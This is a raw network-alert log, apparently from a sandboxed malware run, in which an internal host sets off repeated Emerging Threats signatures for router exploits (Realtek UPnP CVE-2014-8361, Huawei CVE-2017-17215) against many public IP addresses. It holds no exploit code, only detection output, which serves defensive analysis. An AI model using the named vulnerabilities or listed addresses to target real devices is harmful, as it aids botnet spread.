                                                07/20/24-23:06:01.650758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5040452869192.168.2.14164.94.110.129
                                                07/20/24-23:06:24.512033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5166652869192.168.2.1470.225.101.174
                                                07/20/24-23:06:23.161234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5697252869192.168.2.14192.199.88.49
                                                07/20/24-23:06:31.826739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5854652869192.168.2.14211.149.21.5
                                                07/20/24-23:05:52.728680TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24570252869192.168.2.1413.6.44.150
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711637215192.168.2.14197.49.44.239
                                                07/20/24-23:05:39.152981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4376052869192.168.2.14106.152.34.222
                                                07/20/24-23:05:56.404785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752637215192.168.2.1425.39.95.101
                                                07/20/24-23:06:16.628763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615503052869192.168.2.14182.50.115.219
                                                07/20/24-23:05:39.156296TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613661052869192.168.2.14204.228.34.103
                                                07/20/24-23:05:57.922651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426452869192.168.2.1494.62.92.125
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197037215192.168.2.1441.28.231.117
                                                07/20/24-23:05:40.369944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24264852869192.168.2.14171.254.202.145
                                                07/20/24-23:05:36.574959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4454637215192.168.2.14197.59.10.121
                                                07/20/24-23:05:35.786723TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613887052869192.168.2.14135.6.251.247
                                                07/20/24-23:05:37.542495TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3763852869192.168.2.1465.108.13.201
                                                07/20/24-23:05:40.468265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3908852869192.168.2.14203.213.235.166
                                                07/20/24-23:05:35.333329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4092652869192.168.2.1445.129.181.164
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539637215192.168.2.1441.33.186.151
                                                07/20/24-23:05:45.424850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409237215192.168.2.14157.117.39.181
                                                07/20/24-23:07:28.197579TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4573852869192.168.2.1492.219.216.50
                                                07/20/24-23:05:57.457796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5952252869192.168.2.14134.176.234.249
                                                07/20/24-23:05:59.091811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426452869192.168.2.14211.118.237.168
                                                07/20/24-23:05:34.659617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620837215192.168.2.14197.143.99.76
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050037215192.168.2.14197.58.127.106
                                                07/20/24-23:05:57.133658TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24285252869192.168.2.1490.200.1.246
                                                07/20/24-23:06:26.155233TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614150852869192.168.2.14112.38.187.113
                                                07/20/24-23:06:05.864515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3664852869192.168.2.14114.97.238.55
                                                07/20/24-23:06:23.035056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615416652869192.168.2.1479.48.67.12
                                                07/20/24-23:05:48.808887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782837215192.168.2.1441.162.171.182
                                                07/20/24-23:05:45.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503037215192.168.2.14197.241.165.77
                                                07/20/24-23:05:48.773442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561037215192.168.2.14197.48.232.49
                                                07/20/24-23:06:13.708217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4006452869192.168.2.14196.236.253.218
                                                07/20/24-23:06:29.433951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295452869192.168.2.145.229.68.58
                                                07/20/24-23:05:45.090337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614779652869192.168.2.1420.92.193.38
                                                07/20/24-23:06:14.162873TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25908052869192.168.2.1427.172.117.243
                                                07/20/24-23:06:02.064674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5269052869192.168.2.1470.71.56.125
                                                07/20/24-23:06:18.910196TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615968852869192.168.2.14178.70.56.53
                                                07/20/24-23:05:37.440287TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23434052869192.168.2.1452.136.210.121
                                                07/20/24-23:05:52.682403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4668652869192.168.2.1412.241.78.51
                                                07/20/24-23:06:00.018611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24202652869192.168.2.14216.198.201.137
                                                07/20/24-23:07:34.258673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25201852869192.168.2.14104.173.87.38
                                                07/20/24-23:05:45.412131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785437215192.168.2.1441.125.205.155
                                                07/20/24-23:05:45.180728TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5280652869192.168.2.14219.160.20.3
                                                07/20/24-23:06:03.018252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4916852869192.168.2.14199.28.141.22
                                                07/20/24-23:05:38.957923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224237215192.168.2.1441.201.61.250
                                                07/20/24-23:05:45.412131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939437215192.168.2.1442.154.88.136
                                                07/20/24-23:06:24.232736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6048252869192.168.2.14131.102.164.83
                                                07/20/24-23:05:35.213635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614435452869192.168.2.1464.104.54.14
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675237215192.168.2.14157.113.92.240
                                                07/20/24-23:06:56.877705TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613699252869192.168.2.1464.226.150.186
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095037215192.168.2.1441.127.195.65
                                                07/20/24-23:06:03.724116TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615192252869192.168.2.14137.66.165.24
                                                07/20/24-23:06:09.741345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3923652869192.168.2.14203.163.41.229
                                                07/20/24-23:05:42.145992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437637215192.168.2.1441.107.118.63
                                                07/20/24-23:06:08.078658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3634052869192.168.2.1477.217.131.179
                                                07/20/24-23:07:04.503671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4232252869192.168.2.1449.110.216.241
                                                07/20/24-23:05:35.962602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6029852869192.168.2.14183.119.35.244
                                                07/20/24-23:06:02.943061TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614722452869192.168.2.14156.142.205.241
                                                07/20/24-23:06:01.472268TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25549052869192.168.2.14110.206.40.7
                                                07/20/24-23:06:19.491493TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24731852869192.168.2.14165.36.32.222
                                                07/20/24-23:06:50.028546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5788452869192.168.2.1477.65.43.181
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584637215192.168.2.14204.22.161.228
                                                07/20/24-23:05:35.595549TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614985852869192.168.2.14111.192.150.203
                                                07/20/24-23:06:23.120505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4057652869192.168.2.14198.13.151.206
                                                07/20/24-23:05:47.086079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4691437215192.168.2.14157.89.60.239
                                                07/20/24-23:05:40.341196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4048652869192.168.2.1412.148.108.18
                                                07/20/24-23:06:33.320646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615198452869192.168.2.14176.246.163.145
                                                07/20/24-23:05:37.612113TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24945852869192.168.2.14179.21.144.79
                                                07/20/24-23:05:40.334659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3579452869192.168.2.1498.249.26.162
                                                07/20/24-23:05:58.860933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615576652869192.168.2.14129.196.243.121
                                                07/20/24-23:06:15.664506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4327452869192.168.2.14126.165.56.151
                                                07/20/24-23:05:46.240839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021852869192.168.2.14137.251.110.201
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925237215192.168.2.14157.148.29.80
                                                07/20/24-23:06:03.246248TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25291252869192.168.2.14114.102.232.116
                                                07/20/24-23:05:46.119639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422837215192.168.2.1441.204.151.43
                                                07/20/24-23:05:46.827044TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614850652869192.168.2.1414.207.98.101
                                                07/20/24-23:05:57.811975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013852869192.168.2.14191.202.11.9
                                                07/20/24-23:05:48.876892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035437215192.168.2.14219.184.85.94
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386237215192.168.2.14157.23.244.45
                                                07/20/24-23:05:40.457644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23430452869192.168.2.14204.155.193.18
                                                07/20/24-23:06:45.997240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613516652869192.168.2.14154.195.133.68
                                                07/20/24-23:07:01.438132TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25897252869192.168.2.1489.31.185.148
                                                07/20/24-23:06:00.756790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4557252869192.168.2.1471.168.119.24
                                                07/20/24-23:06:49.853581TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25564652869192.168.2.14135.195.82.21
                                                07/20/24-23:05:39.525196TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613898852869192.168.2.1491.115.151.211
                                                07/20/24-23:06:12.572216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616084852869192.168.2.1425.111.49.43
                                                07/20/24-23:05:35.850972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5089852869192.168.2.14143.165.147.195
                                                07/20/24-23:06:01.185323TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615195852869192.168.2.1454.220.188.149
                                                07/20/24-23:05:37.454427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25163652869192.168.2.14204.66.149.99
                                                07/20/24-23:05:52.459686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5301652869192.168.2.14133.77.138.223
                                                07/20/24-23:06:23.088978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4004652869192.168.2.14177.192.100.150
                                                07/20/24-23:06:00.698150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615496252869192.168.2.14182.27.195.239
                                                07/20/24-23:06:15.798798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3838852869192.168.2.149.221.109.93
                                                07/20/24-23:06:01.556801TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23934652869192.168.2.14204.53.157.110
                                                07/20/24-23:06:14.553922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4188652869192.168.2.1451.120.217.33
                                                07/20/24-23:06:00.164884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614787052869192.168.2.1469.215.220.54
                                                07/20/24-23:05:56.403310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039237215192.168.2.14197.180.175.57
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748237215192.168.2.14197.163.208.222
                                                07/20/24-23:05:46.023949TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614403652869192.168.2.1461.177.161.149
                                                07/20/24-23:06:26.096786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614202852869192.168.2.1440.37.104.114
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337637215192.168.2.14197.205.1.129
                                                07/20/24-23:06:00.719355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206437215192.168.2.1482.211.178.236
                                                07/20/24-23:05:58.794030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613362652869192.168.2.14219.175.221.8
                                                07/20/24-23:06:19.602853TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3613452869192.168.2.14217.29.231.50
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833437215192.168.2.14197.93.209.193
                                                07/20/24-23:05:33.827209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729437215192.168.2.14186.23.77.122
                                                07/20/24-23:06:00.470172TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4758852869192.168.2.1425.197.167.180
                                                07/20/24-23:05:45.259708TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5521452869192.168.2.14208.86.138.213
                                                07/20/24-23:05:45.447173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414637215192.168.2.14157.234.69.192
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016437215192.168.2.14197.207.224.61
                                                07/20/24-23:05:48.767395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628837215192.168.2.1441.46.164.245
                                                07/20/24-23:06:53.169467TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24903652869192.168.2.142.56.91.127
                                                07/20/24-23:06:19.817334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4318252869192.168.2.1459.77.93.94
                                                07/20/24-23:06:35.384402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614861052869192.168.2.14154.241.16.98
                                                07/20/24-23:05:59.251571TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614115452869192.168.2.14189.254.123.220
                                                07/20/24-23:05:37.556779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24475452869192.168.2.14196.32.183.241
                                                07/20/24-23:05:44.314673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3416052869192.168.2.1453.151.134.25
                                                07/20/24-23:05:46.788416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3696252869192.168.2.14156.242.205.254
                                                07/20/24-23:06:40.564079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4371252869192.168.2.1448.223.65.67
                                                07/20/24-23:05:57.606471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614755452869192.168.2.1497.49.247.112
                                                07/20/24-23:06:04.825020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6007452869192.168.2.14204.151.52.231
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543437215192.168.2.14157.239.179.90
                                                07/20/24-23:05:52.516035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618052869192.168.2.14103.131.184.129
                                                07/20/24-23:05:52.515827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4754652869192.168.2.14151.188.92.157
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985037215192.168.2.1441.70.125.198
                                                07/20/24-23:05:57.170112TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613790652869192.168.2.14165.91.143.33
                                                07/20/24-23:06:13.586481TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538252869192.168.2.14217.27.61.129
                                                07/20/24-23:06:25.602644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23299452869192.168.2.14200.157.116.174
                                                07/20/24-23:05:57.606361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4348652869192.168.2.1494.175.0.69
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680237215192.168.2.14197.88.18.67
                                                07/20/24-23:05:59.324002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4008452869192.168.2.14106.241.46.107
                                                07/20/24-23:06:07.506329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4177252869192.168.2.14203.105.186.163
                                                07/20/24-23:06:09.587283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3494052869192.168.2.14111.86.168.149
                                                07/20/24-23:05:59.338625TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615323252869192.168.2.14130.32.183.138
                                                07/20/24-23:05:58.107636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3746252869192.168.2.1499.252.205.139
                                                07/20/24-23:06:53.291407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426252869192.168.2.1454.220.188.149
                                                07/20/24-23:05:36.025383TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614777852869192.168.2.1431.247.190.180
                                                07/20/24-23:05:47.345531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614248652869192.168.2.14202.54.99.106
                                                07/20/24-23:06:26.096786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3960852869192.168.2.14102.191.130.120
                                                07/20/24-23:05:48.800446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068437215192.168.2.1441.26.0.156
                                                07/20/24-23:05:58.174966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613493052869192.168.2.14184.183.98.168
                                                07/20/24-23:06:34.929510TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25056452869192.168.2.14138.239.248.75
                                                07/20/24-23:05:59.119232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4544252869192.168.2.14134.45.103.79
                                                07/20/24-23:06:00.781631TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23296252869192.168.2.1448.66.197.202
                                                07/20/24-23:06:01.888773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5973052869192.168.2.1464.149.50.56
                                                07/20/24-23:07:31.562284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4091452869192.168.2.14197.209.68.8
                                                07/20/24-23:05:39.060021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695437215192.168.2.1441.133.210.120
                                                07/20/24-23:05:39.685214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315637215192.168.2.14197.237.206.214
                                                07/20/24-23:05:59.093934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4276852869192.168.2.1447.119.95.118
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847637215192.168.2.14197.60.64.123
                                                07/20/24-23:05:57.702462TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614962052869192.168.2.14201.109.19.43
                                                07/20/24-23:05:36.354373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452237215192.168.2.1441.148.228.193
                                                07/20/24-23:05:38.185047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4448652869192.168.2.14121.164.80.162
                                                07/20/24-23:05:58.093159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4059452869192.168.2.14191.202.11.9
                                                07/20/24-23:05:59.106017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616019852869192.168.2.14130.191.45.135
                                                07/20/24-23:05:57.417957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4938452869192.168.2.1482.73.119.244
                                                07/20/24-23:06:11.305486TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873052869192.168.2.1483.59.179.192
                                                07/20/24-23:06:29.347952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198852869192.168.2.14203.118.70.153
                                                07/20/24-23:05:52.514709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4072452869192.168.2.14219.239.208.112
                                                07/20/24-23:05:52.486069TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982452869192.168.2.14147.146.128.242
                                                07/20/24-23:06:01.784582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4405852869192.168.2.1417.146.227.125
                                                07/20/24-23:07:01.154408TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614542452869192.168.2.1478.217.58.236
                                                07/20/24-23:06:00.464582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614474452869192.168.2.14133.45.19.120
                                                07/20/24-23:05:52.572723TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23671852869192.168.2.14125.155.98.40
                                                07/20/24-23:06:10.772789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4581052869192.168.2.14202.52.251.194
                                                07/20/24-23:05:52.527430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4819452869192.168.2.1451.1.181.74
                                                07/20/24-23:05:35.994808TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614032652869192.168.2.1491.48.213.35
                                                07/20/24-23:05:36.592874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253237215192.168.2.14197.131.18.165
                                                07/20/24-23:05:59.426493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4661652869192.168.2.1466.234.95.91
                                                07/20/24-23:06:14.641445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4521852869192.168.2.14137.55.138.211
                                                07/20/24-23:06:02.466939TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5158652869192.168.2.14160.22.179.152
                                                07/20/24-23:05:44.721858TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23417652869192.168.2.14120.138.189.24
                                                07/20/24-23:05:46.014684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218437215192.168.2.14197.158.154.146
                                                07/20/24-23:05:57.775925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615328652869192.168.2.14148.178.56.30
                                                07/20/24-23:05:35.217231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4480252869192.168.2.14157.104.97.161
